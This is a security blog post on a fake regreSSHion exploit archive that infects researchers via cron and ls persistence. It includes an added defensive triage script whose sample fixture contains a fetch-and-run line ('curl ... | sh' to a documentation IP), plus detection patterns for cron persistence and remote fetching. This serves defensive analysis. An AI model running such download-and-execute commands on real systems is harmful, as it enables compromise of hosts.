An archive containing malicious code is being distributed on the social network X (formerly known as Twitter) under the guise of an exploit for the recently discovered CVE-2024-6387, aka regreSSHion. According to our experts, this may be an attempt to attack cybersecurity specialists. In this post we explain what is actually in the archive and how the attackers are trying to lure researchers into a trap.
The legend behind the archive
The story goes that there is a server with a working exploit for the CVE-2024-6387 vulnerability in OpenSSH, and that this server is actively using the exploit against a list of IP addresses. The archive, offered to anyone who wants to investigate this attack, supposedly contains the working exploit, the list of IP addresses, and some kind of payload.
Real contents of the malicious archive
In fact, the archive contains some source code, a set of malicious binaries, and scripts. The source code looks like a slightly edited version of a non-functional proof-of-concept for this vulnerability that was already publicly available.
One of the scripts, written in Python, pretends to exploit the vulnerability on the servers whose IP addresses are in the list. What it really does is launch a malicious file named exploit: malware whose job is to gain persistence on the system and fetch an additional payload from a remote server. It drops a copy of the malicious code into the /etc/cron.hourly directory, so cron runs it every hour. As a second persistence mechanism it also modifies the ls binary, writing a copy of itself into it, so the malicious code is executed again every time ls is run.
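The following is an added example, not code from the original post or from Kaspersky, showing two checks a researcher would want before and after handling such an archive: a static triage of the extracted files (hash everything, tag ELF binaries by magic, and look for strings a genuine PoC for a remote OpenSSH bug has no reason to contain, such as cron.hourly paths, references to ls, or a call that launches a local file named exploit), and a host check for the persistence technique described above (entries in /etc/cron.hourly and an ls binary whose hash no longer matches a known-good value). All sample files, the file names, the suspicious-string heuristics, and the IP addresses are constructed assumptions; the "binaries" are inert byte strings.

```python
# Added example (not code from the original post or from Kaspersky): offline
# triage of an extracted "PoC" archive plus a host check for the persistence
# technique described above. Sample files, names and heuristics are
# constructed assumptions; nothing here is executed, only read and hashed.
import hashlib
import re
import tempfile
from pathlib import Path

ELF_MAGIC = b"\x7fELF"

# Byte patterns a genuine PoC for a remote OpenSSH bug has no reason to
# contain, but which fit the behaviour described in the post (assumed list).
SUSPICIOUS_PATTERNS = {
    "cron_persistence": re.compile(rb"/etc/cron\.(?:hourly|daily|d)\b"),
    "launches_local_binary": re.compile(
        rb"(?:subprocess\.\w+|os\.system|os\.exec\w*|popen)\s*\([^)]{0,80}\bexploit\b"),
    "touches_ls": re.compile(rb"/(?:usr/)?bin/ls\b"),
    "remote_fetch": re.compile(rb"\b(?:curl|wget|urllib|requests)\b"),
}

# Constructed stand-in for a clean ls binary, used to derive a known-good hash.
CLEAN_LS_BYTES = ELF_MAGIC + b" constructed stand-in for a clean ls binary\n"


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def triage_archive(root):
    """Hash every file under root, tag ELF binaries by magic and record which
    suspicious patterns each file contains. Returns one dict per file."""
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        data = p.read_bytes()
        findings.append({
            "path": str(p.relative_to(root)),
            "sha256": sha256_bytes(data),
            "kind": "elf" if data.startswith(ELF_MAGIC) else "text",
            "hits": [n for n, rx in SUSPICIOUS_PATTERNS.items() if rx.search(data)],
        })
    return findings


def check_persistence(cron_hourly_dir, ls_path, known_good_ls_sha256):
    """List every entry in cron.hourly (each one needs a justification) and
    report whether ls still matches the known-good hash."""
    issues = []
    for p in sorted(Path(cron_hourly_dir).iterdir()):
        if p.is_file():
            issues.append(f"cron.hourly entry: {p.name} sha256={sha256_bytes(p.read_bytes())}")
    actual = sha256_bytes(Path(ls_path).read_bytes())
    if actual != known_good_ls_sha256:
        issues.append(f"ls modified: expected {known_good_ls_sha256[:12]}, got {actual[:12]}")
    return issues


def build_sample():
    """Construct a small fake archive and fake host tree for an offline run.
    Addresses are from RFC 5737 documentation ranges; binaries are inert."""
    base = Path(tempfile.mkdtemp(prefix="regresshion-lure-"))
    archive = base / "archive"
    archive.mkdir()
    (archive / "ips.txt").write_text("192.0.2.10\n192.0.2.11\n")
    # The "scanner" that prints fake results and launches the local dropper.
    (archive / "exploit.py").write_text(
        "import subprocess\n"
        "for ip in open('ips.txt'):\n"
        "    print(f'[+] {ip.strip()} vulnerable, sending payload...')\n"
        "    subprocess.run(['./exploit', ip.strip()])\n")
    # Inert stand-in for the dropper: ELF magic plus strings a real one carries.
    (archive / "exploit").write_bytes(
        ELF_MAGIC + b"\x00/etc/cron.hourly/0sysupdate\x00/bin/ls\x00curl\x00")
    host = base / "host"
    cron = host / "cron.hourly"
    cron.mkdir(parents=True)
    (cron / "0sysupdate").write_text("#!/bin/sh\ncurl -s http://203.0.113.5/p | sh\n")
    ls_path = host / "ls"
    ls_path.write_bytes(CLEAN_LS_BYTES + b"<appended infector stub>")  # "infected" ls
    return archive, cron, ls_path


if __name__ == "__main__":
    archive, cron, ls_path = build_sample()
    for f in triage_archive(archive):
        print(f"{f['kind']:4} {f['sha256'][:12]} {f['path']:<12} {','.join(f['hits']) or '-'}")
    for issue in check_persistence(cron, ls_path, sha256_bytes(CLEAN_LS_BYTES)):
        print("!!", issue)
```

On a real host the known-good hash for ls should come from the distribution's package metadata rather than from the file itself, for example by running `dpkg -V coreutils` or `rpm -V coreutils`, since a file that has already been modified cannot vouch for itself. The triage step never runs anything from the archive; that is the point, because the lure only works if the "exploit" is executed.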
How to Stay Safe
The attackers are evidently counting on researchers doing what they often do with obviously malicious code: disabling security solutions and concentrating on the traffic between the supposed exploit and a server vulnerable to CVE-2024-6387. While the researcher's attention is there, entirely different malicious code compromises the researcher's own machine.
We therefore remind all information security experts, and anyone else who likes to analyze suspicious code, not to work with malware outside a specially prepared isolated environment from which external infrastructure is unreachable. In this case the lure works precisely because the archive's "exploit" has to be run to see anything at all, so treat every binary and script in such an archive as hostile until it has been analyzed.
Kaspersky products detect elements of this attack with the following verdicts:
- UDS:Trojan-Downloader.Shell.FakeChecker.a
- UDS:Trojan.Python.FakeChecker.a
- HEUR:Trojan.Linux.Agent.gen
- Virus.Linux.Lamer.b
- HEUR:DoS.Linux.Agent.dt
As for the regreSSHion vulnerability itself, as we wrote earlier, exploiting it in practice is far from simple.